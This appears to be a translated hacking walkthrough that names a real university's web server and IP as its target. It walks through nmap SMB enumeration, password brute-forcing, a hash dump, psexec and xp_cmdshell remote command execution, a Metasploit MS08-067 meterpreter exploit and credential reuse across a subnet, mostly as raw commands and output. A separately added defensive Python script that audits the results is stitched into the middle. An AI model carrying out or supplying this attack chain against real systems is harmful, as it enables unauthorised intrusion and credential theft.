Guangxi Normal University website http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc        Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the accounts that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // dump the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
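As an added example (not code from the original post), a defender-side triage script in Python: it parses smb-brute and smb-pwdump result lines of the shape shown above and flags blank or guessable passwords, accounts that still store an LM hash (LM hashing enabled), and LM hashes whose second half is the empty-half constant, which reveals a password of seven characters or fewer. The sample lines are reconstructed from the output above; the account names and hashes are the ones the post prints.

```python
import re

# Constructed sample: smb-brute and smb-pwdump host-script lines in the shape the
# post shows (account names and hashes are the ones printed above).
SAMPLE = """\
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
"""

# The LM algorithm hashes each 7-byte half of the password separately; an empty
# half always produces this constant, so an LM hash ending in it means the
# password is at most 7 characters long.
EMPTY_LM_HALF = "AAD3B435B51404EE"

BRUTE_RE = re.compile(r"^(?:\|_?)?\s*(?P<user>[^:|]+):(?P<pw>.*?) => Login was successful")
PWDUMP_RE = re.compile(r"^(?:\|_?)?\s*(?P<user>[^:|]+):\d+ => (?P<lm>[^:]+):(?P<ntlm>.+)$")


def audit_line(line):
    """Return (account, finding) tuples for one smb-brute or smb-pwdump result line."""
    findings = []
    m = BRUTE_RE.match(line)
    if m:
        kind = "blank" if m.group("pw") == "<blank>" else "guessable"
        findings.append((m.group("user"), f"{kind} password accepted over SMB"))
        return findings
    m = PWDUMP_RE.match(line)
    if m:
        user = m.group("user")
        lm, ntlm = m.group("lm").upper(), m.group("ntlm").strip().upper()
        # pwdump prints "NO PASSWORD***" where a hash equals the empty-password hash.
        if lm.startswith("NO PASSWORD") and ntlm.startswith("NO PASSWORD"):
            findings.append((user, "blank password stored in SAM"))
        elif not lm.startswith("NO PASSWORD"):
            findings.append((user, "LM hash stored (LM hashing still enabled)"))
            if lm.endswith(EMPTY_LM_HALF):
                findings.append((user, "LM hash shows password is 7 characters or fewer"))
    return findings


def audit_report(text):
    """Run audit_line over every line of nmap output and collect all findings."""
    return [f for line in text.splitlines() for f in audit_line(line)]
```

Calling audit_report(SAMPLE) yields six findings; in a real audit the remediation is disabling LM hash storage (NoLMHash) and enforcing a password policy rather than the offensive follow-up the post describes.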
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"    // log in remotely as sa and run a command
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
root@bt:~# msfconsole    // use the MS08-067 vulnerability in msf to overflow the target machine
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the captured hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

The attack succeeded: a simple msf + nmap attack.